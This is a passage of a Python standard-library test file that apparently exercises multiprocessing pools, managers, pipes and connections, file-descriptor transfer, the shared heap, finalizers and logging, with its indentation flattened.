with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_del_pool(self):
p = self.Pool(1)
wr = weakref.ref(p)
del p
gc.collect()
self.assertIsNone(wr())
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
